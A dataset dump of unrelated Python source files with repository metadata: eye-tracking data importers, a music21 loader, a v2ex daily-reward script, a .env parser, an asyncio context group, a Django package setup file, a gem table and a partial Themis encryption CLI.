# pl['pupil_positions'][ix]['timestamp'] = pl['pupil_positions'][ix]['timestamp'] * slope + intercept# + 0.045 # the 45ms are the pupillabs defined delay between camera image & timestamp3
# this code is to get notifications into sample time stamp. But for now we
for ix,m in enumerate(pl['notifications']):
pl['notifications'][ix]['timestamp'] = pl['notifications'][ix]['timestamp'] * slope + intercept + 0.045 # the 45ms are the pupillabs defined delay between camera image & timestamp3
return(pl)
def raw_pl_data(subject='',datapath='/net/store/nbp/projects/etcomp/',postfix='raw'):
# Input: subjectname, datapath
# Output: Returns pupillabs dictionary
from lib.pupil.pupil_src.shared_modules import file_methods as pl_file_methods
if subject == '':
filename = datapath
else:
filename = os.path.join(datapath,subject,postfix)
print(os.path.join(filename,'pupil_data'))
# with dict_keys(['notifications', 'pupil_positions', 'gaze_positions'])
# where each value is a list that contains a dictionary
original_pldata = pl_file_methods.load_object(os.path.join(filename,'pupil_data'))
#original_pldata = pl_file_methods.Incremental_Legacy_Pupil_Data_Loader(os.path.join(filename,'pupil_data'))
# 'notification'
# dict_keys(['record', 'subject', 'timestamp', 'label', 'duration'])
# 'pupil_positions'
# dict_keys(['diameter', 'confidence', 'method', 'norm_pos', 'timestamp', 'id', 'topic', 'ellipse'])
# 'gaze_positions'
# dict_keys(['base_data', 'timestamp', 'topic', 'confidence', 'norm_pos'])
# where 'base_data' has a dict within a list
# dict_keys(['diameter', 'confidence', 'method', 'norm_pos', 'timestamp', 'id', 'topic', 'ellipse'])
# where 'normpos' is a list (with horizon. and vert. component)
# Fix the (possible) timelag of pupillabs camera vs. computer time
return original_pldata
def import_pl(subject='', datapath='/net/store/nbp/projects/etcomp/', recalib=True, surfaceMap=True,parsemsg=True,fixTimeLag=True,px2deg=True,pupildetect=None,
pupildetect_options=None):
# Input: subject: (str) name
# datapath: (str) location where data is stored
# surfaceMap:
# Output: Returns 2 dfs (plsamples and plmsgs)
# get a logger
logger = logging.getLogger(__name__)
if pupildetect:
# has to be imported first
import av
import ctypes
ctypes.cdll.LoadLibrary('/net/store/nbp/users/behinger/projects/etcomp/local/build/build_ceres_working/lib/libceres.so.2')
if surfaceMap:
# has to be imported before nbp recalib
try:
import functions.pl_surface as pl_surface
except ImportError:
raise('Custom Error:Could not import pl_surface')
assert(type(subject)==str)
# Get samples df
# (is still a dictionary here)
original_pldata = raw_pl_data(subject=subject, datapath=datapath)
if pupildetect is not None: # can be 2d or 3d
from functions.nbp_pupildetect import nbp_pupildetect
if subject == '':
filename = datapath
else:
filename = os.path.join(datapath,subject,'raw')
pupil_positions_0= nbp_pupildetect(detector_type = pupildetect, eye_id = 0,folder=filename,pupildetect_options=pupildetect_options)
pupil_positions_1= nbp_pupildetect(detector_type = pupildetect, eye_id = 1,folder=filename,pupildetect_options=pupildetect_options)
pupil_positions = pupil_positions_0 + pupil_positions_1
original_pldata['pupil_positions'] = pupil_positions
recalib=True
# recalibrate data
if recalib:
from functions import nbp_recalib
if pupildetect is not None:
original_pldata['gaze_positions'] = nbp_recalib.nbp_recalib(original_pldata,calibration_mode=pupildetect)
original_pldata['gaze_positions'] = nbp_recalib.nbp_recalib(original_pldata)
# Fix timing
# Pupillabs cameras ,have their own timestamps & clock. The msgs are clocked via computertime. Sometimes computertime&cameratime show drift (~40% of cases).
# We fix this here
if fixTimeLag:
original_pldata = pl_fix_timelag(original_pldata)
if surfaceMap:
folder= os.path.join(datapath,subject,'raw')
tracker = pl_surface.map_surface(folder)
gaze_on_srf = pl_surface.surface_map_data(tracker,original_pldata['gaze_positions'])
logger.warning('Original Data Samples: %s on surface: %s',len(original_pldata['gaze_positions']),len(gaze_on_srf))
original_pldata['gaze_positions'] = gaze_on_srf
# use pupilhelper func to make samples df (confidence, gx, gy, smpl_time, diameter)
pldata = gaze_to_pandas(original_pldata['gaze_positions'])
if surfaceMap:
pldata.gx = pldata.gx*(1920 - 2*(75+18))+(75+18) # minus white border of marker & marker
pldata.gy = pldata.gy*(1080- 2*(75+18))+(75+18)
logger.debug('Mapped Surface to ScreenSize 1920 & 1080 (minus markers)')
del tracker
# sort according to smpl_time
pldata.sort_values('smpl_time',inplace=True)
# get the nice samples df
plsamples = make_df.make_samples_df(pldata,px2deg=px2deg) #
if parsemsg:
# Get msgs df
# make a list of gridnotes that contain all notifications of original_pldata if they contain 'label'
gridnotes = [note for note in original_pldata['notifications'] if 'label' in note.keys()]
plmsgs = pd.DataFrame();
for note in gridnotes:
msg = parse.parse_message(note)
if not msg.empty:
plmsgs = plmsgs.append(msg, ignore_index=True)
plmsgs = fix_smallgrid_parser(plmsgs)
else:
plmsgs = original_pldata['notifications']
plevents = pd.DataFrame()
return plsamples, plmsgs,plevents
#%% EYELINK
def raw_el_data(subject, datapath='/net/store/nbp/projects/etcomp/'):
# Input: subjectname, datapath
# Output: Returns pupillabs dictionary
filename = os.path.join(datapath,subject,'raw')
from pyedfread import edf # parses SR research EDF data files into pandas df
elsamples, elevents, elnotes = edf.pread(os.path.join(filename,findFile(filename,'.EDF')[0]), trial_marker=b'')
return (elsamples,elevents,elnotes)
def import_el(subject, datapath='/net/store/nbp/projects/etcomp/'):
# Input: subject: (str) name
# datapath: (str) location where data is stored
# Output: Returns list of 3 el df (elsamples, elmsgs, elevents)
assert(type(subject)==str)
# get a logger
logger = logging.getLogger(__name__)
# Load edf
# load and preprocess data from raw data files
# elsamples: contains individual EL samples
# elevents: contains fixation and saccade definitions
# elnotes: contains notes (meta data) associated with each trial
elsamples,elevents,elnotes = raw_el_data(subject,datapath)
# TODO understand and fix this
count = 0
while np.any(elsamples.time>1e10) and count < 40:
from pyedfread import edf # parses SR research EDF data files into pandas df
imp.reload(edf)
count = count + 1
# logger.error(elsamples.time[elsamples.time>1e10])
logger.error('Attention: Found sampling time above 1*e100. Clearly wrong! Trying again (check again later)')
elsamples, elevents, elnotes = raw_el_data(subject,datapath)
# We also delete Samples with interpolated pupil responses. In one dataset these were ~800samples.
logger.warning('Deleting %.4f%% due to interpolated pupil (online during eyelink recording)'%(100*np.mean(elsamples.errors ==8)))
logger.warning('Deleting %.4f%% due to other errors in the import process'%(100*np.mean((elsamples.errors !=8) & (elsamples.errors!=0))))
elsamples = elsamples.loc[elsamples.errors == 0]
# We had issues with samples with negative time
logger.warning('Deleting %.4f%% samples due to time<=0'%(100*np.mean(elsamples.time<=0)))
elsamples = elsamples.loc[elsamples.time > 0]
# Also at the end of the recording, we had time samples that were smaller than the first sample.
# Note that this assumes the samples are correctly ordered and the last samples actually
# refer to artefacts. If you use %SYNCTIME% this might be problematic (don't know how nwilming's edfread incorporates synctime)
logger.warning('Deleting %.4f%% samples due to time being less than the starting time'%(100*np.mean(elsamples.time <= elsamples.time[0])))
elsamples = elsamples.loc[elsamples.time > elsamples.time[0]]
elsamples = elsamples.reset_index()
# Convert to same units
# change to seconds to be the same as pupil
elsamples['smpl_time'] = elsamples['time'] / 1000
elnotes['msg_time'] = elnotes['trialid_time'] / 1000
elnotes = elnotes.drop('trialid_time',axis=1)
elevents['start'] = elevents['start'] / 1000
elevents['end'] = elevents['end'] / 1000
# TODO solve this!
if np.any(elsamples.smpl_time>1e10):
logger.error(elsamples.smpl_time[elsamples.smpl_time>1e10])
logger.error('Error, even after reloading the data once, found sampling time above 1*e100. This is clearly wrong. Investigate')
raise Exception('Error, even after reloading the data once, found sampling time above 1*e100. This is clearly wrong. Investigate')
# for horizontal gaze component
# Idea: Logical indexing
ix_left = elsamples.gx_left != -32768
ix_right = elsamples.gx_right != -32768
# take the pupil area pa of the recorded eye
# set pa to NaN instead of 0 or -32768
elsamples.loc[elsamples['pa_right'] < 1e-20,'pa_right'] = np.nan
elsamples.loc[~ix_right,'pa_right'] = np.nan
elsamples.loc[elsamples['pa_left'] < 1e-20,'pa_left'] = np.nan
elsamples.loc[~ix_left,'pa_left'] = np.nan
# add pa column that takes the value that is not NaN
ix_left = ~np.isnan(elsamples.pa_left)
ix_right = ~np.isnan(elsamples.pa_right)
# init with nan
elsamples['pa'] = np.nan
elsamples.loc[ix_left, 'pa'] = elsamples.pa_left[ix_left]
elsamples.loc[ix_right,'pa'] = elsamples.pa_right[ix_right]
# Determine which eye was recorded
ix_left = elsamples.gx_left != -32768
ix_right = elsamples.gx_right != -32768
if (np.mean(ix_left | ix_right)<0.99):
raise NameError('In more than 1 % neither left or right data')
# for horizontal gaze component
elsamples.loc[ix_left,'gx'] = elsamples.gx_left[ix_left]
elsamples.loc[ix_right,'gx'] = elsamples.gx_right[ix_right]
# for horizontal gaze velocity component
elsamples.loc[ix_left,'gx_vel'] = elsamples.gxvel_left[ix_left]
elsamples.loc[ix_right,'gx_vel'] = elsamples.gxvel_right[ix_right]
# for vertical gaze component
ix_left = elsamples.gy_left != -32768
ix_right = elsamples.gy_right != -32768
elsamples.loc[ix_left,'gy'] = elsamples.gy_left[ix_left]
elsamples.loc[ix_right,'gy'] = elsamples.gy_right[ix_right]
# for vertical gaze velocity component
elsamples.loc[ix_left,'gy_vel'] = elsamples.gyvel_left[ix_left]
elsamples.loc[ix_right,'gy_vel'] = elsamples.gyvel_right[ix_right]
# Make (0,0) the point bottom left
elsamples['gy'] = 1080 - elsamples['gy']
# "select" relevant columns
elsamples = make_df.make_samples_df(elsamples)
# Parse EL msg
elmsgs = elnotes.apply(parse.parse_message,axis=1)
elmsgs = elmsgs.drop(elmsgs.index[elmsgs.isnull().all(1)])
elmsgs = fix_smallgrid_parser(elmsgs)
return elsamples, elmsgs, elevents
def fix_smallgrid_parser(etmsgs):
# This fixes the missing separation between smallgrid before and small grid after. During experimental sending both were named identical.
replaceGrid = pd.Series([k for l in [13*['SMALLGRID_BEFORE'],13*['SMALLGRID_AFTER']]*6 for k in l])
ix = etmsgs.query('grid_size==13').index
if len(ix) is not 156:
raise RuntimeError('we need to have 156 small grid msgs')
replaceGrid.index = ix
etmsgs.loc[ix,'condition'] = replaceGrid
# this here fixes that all buttonpresses and stop messages etc. were send as GRID and not SMALLGG
for blockid in etmsgs.block.dropna().unique():
if blockid == 0:
continue
tmp = etmsgs.query('block==@blockid')
t_before_start = tmp.query('condition=="DILATION"& exp_event=="stop"').msg_time.values
t_before_end = tmp.query('condition=="SHAKE" & exp_event=="stop"').msg_time.values
t_after_start = tmp.query('condition=="SHAKE" & exp_event=="stop"').msg_time.values
t_after_end =tmp.iloc[-1].msg_time
ix = tmp.query('condition=="GRID"&msg_time>@t_before_start & msg_time<=@t_before_end').index
etmsgs.loc[ix,'condition'] = 'SMALLGRID_BEFORE'
ix = tmp.query('condition=="GRID"&msg_time>@t_after_start & msg_time<=@t_after_end').index
etmsgs.loc[ix,'condition'] = 'SMALLGRID_AFTER'
return(etmsgs)
| 42.522346
| 200
| 0.670564
| 2,017
| 15,223
| 4.920178
| 0.241943
| 0.025393
| 0.016929
| 0.016324
| 0.371927
| 0.329303
| 0.280431
| 0.207477
| 0.135228
| 0.128376
| 0
| 0.018603
| 0.219602
| 15,223
| 358
| 201
| 42.522346
| 0.816751
| 0.312488
| 0
| 0.157895
| 0
| 0.023392
| 0.183931
| 0.037712
| 0
| 0
| 0
| 0.002793
| 0.011696
| 1
| 0.035088
| false
| 0
| 0.140351
| 0
| 0.19883
| 0.005848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889138e8c38a61134d0f1c1dd8b79dfd0eb55e28
| 768
|
py
|
Python
|
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | 4
|
2021-09-24T13:44:22.000Z
|
2022-03-23T14:03:51.000Z
|
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | null | null | null |
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | 2
|
2022-02-14T10:01:10.000Z
|
2022-03-31T15:40:06.000Z
|
import music21
KEY_TO_SEMITONE = {'c': 0, 'c#': 1, 'db': 1, 'd': 2, 'd#': 3, 'eb': 3, 'e': 4,
'f': 5, 'f#': 6, 'gb': 6, 'g': 7, 'g#': 8, 'ab': 8, 'a': 9,
'a#': 10, 'bb': 10, 'b': 11, 'x': None}
def parse_note(note):
n = KEY_TO_SEMITONE[note[:-1].lower()]
octave = int(note[-1]) + 1
return octave * 12 + n - 21
translate5 = {
46: 0,
48: 1,
50: 2,
51: 3,
53: 4,
55: 5,
56: 6,
58: 7,
}
def load_test5(times=1):
sc = music21.converter.parse('test5.musicxml')
rh = [translate5[parse_note(str(n.pitch).lower())] for n in sc.parts[0].flat.getElementsByClass('Note')]
pieces = []
for _ in range(times):
pieces.append(rh)
return pieces
# print(load_test5())
| 21.333333
| 108
| 0.492188
| 120
| 768
| 3.075
| 0.566667
| 0.0271
| 0.070461
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113346
| 0.28776
| 768
| 36
| 109
| 21.333333
| 0.561243
| 0.02474
| 0
| 0
| 0
| 0
| 0.061497
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88940ecc81bb7244f9aadc5c0b28b58ae24e3599
| 1,698
|
py
|
Python
|
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import http.cookiejar
import urllib.request
# your v2ex cookie value for key [auth] after login
# refer README.md if cannot find cookie [auth]
V2EX_COOKIE = ''
V2EX_DOMAIN = r'v2ex.com'
V2EX_URL_START = r'https://' + V2EX_DOMAIN
V2EX_MISSION = V2EX_URL_START + r'/mission/daily'
V2EX_COIN_URL = r'/mission/daily/redeem?once='
def get_once_url(data):
p = '/mission/daily/redeem\?once=\d+'
m = re.search(p, data.decode())
if m:
return m.group()
else:
return None
def make_cookie(name, value):
return http.cookiejar.Cookie(
version=0,
name=name,
value=value,
port=None,
port_specified=False,
domain=V2EX_DOMAIN,
domain_specified=True,
domain_initial_dot=False,
path='/',
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest=None
)
if __name__ == '__main__':
cj = http.cookiejar.CookieJar()
cj.set_cookie(make_cookie('auth', V2EX_COOKIE))
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
opener.addheaders = [
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0'),
('Referer', V2EX_MISSION)
]
opener.open(V2EX_URL_START).read()
data = opener.open(V2EX_MISSION).read()
once = get_once_url(data)
if not once:
print('"once" not found, maybe you already got coins')
sys.exit(-1)
v2ex_coin_url = V2EX_URL_START + once
print(v2ex_coin_url)
opener.open(v2ex_coin_url).read()
| 24.257143
| 92
| 0.636631
| 231
| 1,698
| 4.480519
| 0.4329
| 0.027053
| 0.046377
| 0.038647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030116
| 0.237338
| 1,698
| 69
| 93
| 24.608696
| 0.769112
| 0.080683
| 0
| 0
| 0
| 0.019231
| 0.146435
| 0.037251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0.019231
| 0.173077
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8894291bf420c1eeb84dea70fc3a6ddba70429ed
| 2,309
|
py
|
Python
|
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | null | null | null |
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | 1
|
2017-07-18T20:49:43.000Z
|
2017-07-20T15:14:10.000Z
|
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | 1
|
2018-04-11T11:55:55.000Z
|
2018-04-11T11:55:55.000Z
|
# -*- coding: utf-8 -*-
import re
import shlex
import os
import inspect
__version__ = '1.1.0'
try:
FileNotFoundError
except NameError: # Python 2
FileNotFoundError = IOError
ENV = '.env'
def read_env(path=None, environ=None, recurse=True):
"""Reads a .env file into ``environ`` (which defaults to ``os.environ``).
If .env is not found in the directory from which this function is called, recurse
up the directory tree until a .env file is found.
"""
environ = environ if environ is not None else os.environ
# By default, start search from the same file this function is called
if path is None:
frame = inspect.currentframe().f_back
caller_dir = os.path.dirname(frame.f_code.co_filename)
path = os.path.join(os.path.abspath(caller_dir), ENV)
if recurse:
current = path
pardir = os.path.abspath(os.path.join(current, os.pardir))
while current != pardir:
target = os.path.join(current, ENV)
if os.path.exists(target):
path = os.path.abspath(target)
break
else:
current = os.path.abspath(os.path.join(current, os.pardir))
pardir = os.path.abspath(os.path.join(current, os.pardir))
if not path:
raise FileNotFoundError('Could not find a .env file')
with open(path, 'r') as fp:
content = fp.read()
parsed = parse_env(content)
for key, value in parsed.items():
environ.setdefault(key, value)
_ITEM_RE = re.compile(r'[A-Za-z_][A-Za-z_0-9]*')
# From Honcho. See NOTICE file for license details.
def parse_env(content):
"""Parse the content of a .env file (a line-delimited KEY=value format) into a
dictionary mapping keys to values.
"""
values = {}
for line in content.splitlines():
lexer = shlex.shlex(line, posix=True)
tokens = list(lexer)
# parses the assignment statement
if len(tokens) < 3:
continue
name, op = tokens[:2]
value = ''.join(tokens[2:])
if op != '=':
continue
if not _ITEM_RE.match(name):
continue
value = value.replace(r'\n', '\n')
value = value.replace(r'\t', '\t')
values[name] = value
return values
| 30.381579
| 85
| 0.603291
| 314
| 2,309
| 4.378981
| 0.39172
| 0.052364
| 0.036364
| 0.049455
| 0.091636
| 0.091636
| 0.091636
| 0.091636
| 0.091636
| 0.064
| 0
| 0.006024
| 0.281074
| 2,309
| 75
| 86
| 30.786667
| 0.822289
| 0.214379
| 0
| 0.096154
| 0
| 0
| 0.037704
| 0.01238
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.134615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889bb7e2d51608191ee475ae210800ea251a72c4
| 2,535
|
py
|
Python
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 14
|
2020-08-24T18:23:31.000Z
|
2021-11-04T14:11:04.000Z
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 19
|
2020-08-25T15:57:05.000Z
|
2021-07-07T00:49:45.000Z
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 7
|
2020-08-24T22:53:02.000Z
|
2022-03-28T18:51:48.000Z
|
import asyncio
import sys
from types import TracebackType
from typing import Any, AsyncContextManager, List, Optional, Sequence, Tuple, Type
from trio import MultiError
from p2p.asyncio_utils import create_task
class AsyncContextGroup:
def __init__(self, context_managers: Sequence[AsyncContextManager[Any]]) -> None:
self.cms = tuple(context_managers)
self.cms_to_exit: Sequence[AsyncContextManager[Any]] = tuple()
async def __aenter__(self) -> Tuple[Any, ...]:
futures = [create_task(cm.__aenter__(), f'AsyncContextGroup/{repr(cm)}') for cm in self.cms]
await asyncio.wait(futures)
# Exclude futures not successfully entered from the list so that we don't attempt to exit
# them.
self.cms_to_exit = tuple(
cm for cm, future in zip(self.cms, futures)
if not future.cancelled() and not future.exception())
try:
return tuple(future.result() for future in futures)
except: # noqa: E722
await self._exit(*sys.exc_info())
raise
async def _exit(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
if not self.cms_to_exit:
return
# don't use gather() to ensure that we wait for all __aexit__s
# to complete even if one of them raises
done, _pending = await asyncio.wait(
[cm.__aexit__(exc_type, exc_value, traceback) for cm in self.cms_to_exit])
# This is to ensure we re-raise any exceptions our coroutines raise when exiting.
errors: List[Tuple[Type[BaseException], BaseException, TracebackType]] = []
for d in done:
try:
d.result()
except BaseException:
errors.append(sys.exc_info())
if errors:
raise MultiError(
tuple(exc_value.with_traceback(exc_tb) for _, exc_value, exc_tb in errors))
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
# Since exits are running in parallel, they can't see each
# other exceptions, so send exception info from `async with`
# body to all.
await self._exit(exc_type, exc_value, traceback)
| 40.887097
| 100
| 0.613018
| 300
| 2,535
| 4.99
| 0.363333
| 0.032732
| 0.024048
| 0.034736
| 0.183033
| 0.132265
| 0.132265
| 0.132265
| 0.132265
| 0.132265
| 0
| 0.002269
| 0.304536
| 2,535
| 61
| 101
| 41.557377
| 0.846852
| 0.162919
| 0
| 0.222222
| 0
| 0
| 0.013258
| 0.013258
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.133333
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889d4cf4c9e065bcd8eb21c034baa0e27279103e
| 895
|
py
|
Python
|
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
VERSION = '0.2'
setup(
name='trybox-django',
version=VERSION,
description='TryBox:Django',
author='Sophilabs',
author_email='contact@sophilabs.com',
url='https://github.com/sophilabs/trybox-django',
download_url='http://github.com/sophilabs/trybox-django/tarball/trybox-django-v{0}#egg=trybox-django'.format(VERSION),
license='MIT',
install_requires=['django', 'trybox'],
dependency_links=['https://github.com/sophilabs/trybox/tarball/master#egg=trybox'],
packages=find_packages(),
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
)
| 34.423077
| 122
| 0.660335
| 95
| 895
| 6.157895
| 0.568421
| 0.123077
| 0.092308
| 0.123077
| 0.160684
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005487
| 0.185475
| 895
| 26
| 123
| 34.423077
| 0.796982
| 0
| 0
| 0
| 0
| 0.041667
| 0.53125
| 0.023438
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889e2666b623f8c9aac578a42112779d0960a46c
| 1,152
|
py
|
Python
|
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.items import gems
class GemTypeRow(object):
__slots__ = ["min_percent", "max_percent", "gem_type"]
def __init__(self, min_percent, max_percent, gem_type):
self.min_percent = min_percent
self.max_percent = max_percent
self.gem_type = gem_type
class GemTypeTable(object):
rows = [
GemTypeRow(1, 10, gems.Greenstone),
GemTypeRow(11, 20, gems.Malachite),
GemTypeRow(21, 28, gems.Aventurine),
GemTypeRow(29, 38, gems.Phenalope),
GemTypeRow(39, 45, gems.Amethyst),
GemTypeRow(46, 54, gems.Fluorospar),
GemTypeRow(55, 60, gems.Garnet),
GemTypeRow(61, 65, gems.Alexandrite),
GemTypeRow(66, 70, gems.Topaz),
GemTypeRow(71, 75, gems.Bloodstone),
GemTypeRow(76, 79, gems.Sapphire),
GemTypeRow(80, 89, gems.Diamond),
GemTypeRow(90, 94, gems.FireOpal),
GemTypeRow(95, 97, gems.Ruby),
GemTypeRow(98, 100, gems.Emerald),
]
@classmethod
def get(cls, roll_value):
return next((row for row in cls.rows
if row.min_percent <= roll_value <= row.max_percent))
| 32
| 74
| 0.623264
| 141
| 1,152
| 4.921986
| 0.531915
| 0.072046
| 0.073487
| 0.057637
| 0.07781
| 0.07781
| 0
| 0
| 0
| 0
| 0
| 0.070012
| 0.256076
| 1,152
| 35
| 75
| 32.914286
| 0.73979
| 0
| 0
| 0
| 0
| 0
| 0.026042
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0.034483
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a1741eae3c2334f95c70dcecbe762feec732c9
| 1,964
|
py
|
Python
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 1,561
|
2015-05-20T05:19:29.000Z
|
2022-03-31T17:32:55.000Z
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 536
|
2015-05-20T13:57:08.000Z
|
2022-03-15T18:02:59.000Z
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 141
|
2015-05-20T13:22:45.000Z
|
2022-03-29T01:29:40.000Z
|
#
# Copyright (c) 2017 Cossack Labs Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from base64 import b64encode, b64decode
from pythemis import smessage
_, COMMAND, SENDER_PRIVATE_KEY, RECIPIENT_PUBLIC_KEY, MESSAGE = range(5)
if len(sys.argv) != 5:
print('Usage: <command: enc | dec | sign | verify > <send_private_key> <recipient_public_key> <message>')
exit(1)
command = sys.argv[COMMAND]
private_key_path = sys.argv[SENDER_PRIVATE_KEY]
public_key_path = sys.argv[RECIPIENT_PUBLIC_KEY]
message = sys.argv[MESSAGE]
with open(private_key_path, 'rb') as f:
private_key = f.read()
with open(public_key_path, 'rb') as f:
public_key = f.read()
message_encrypter = smessage.SMessage(private_key, public_key)
if command == 'enc':
encrypted = message_encrypter.wrap(message.encode('utf-8'))
encoded = b64encode(encrypted)
print(encoded.decode('ascii'))
elif command == 'dec':
decoded = b64decode(message.encode('utf-8'))
decrypted = message_encrypter.unwrap(decoded)
print(decrypted.decode('utf-8'))
elif command == 'sign':
encrypted = smessage.ssign(private_key, message.encode('utf-8'))
encoded = b64encode(encrypted)
print(encoded.decode('ascii'))
elif command == 'verify':
decoded = b64decode(message.encode('utf-8'))
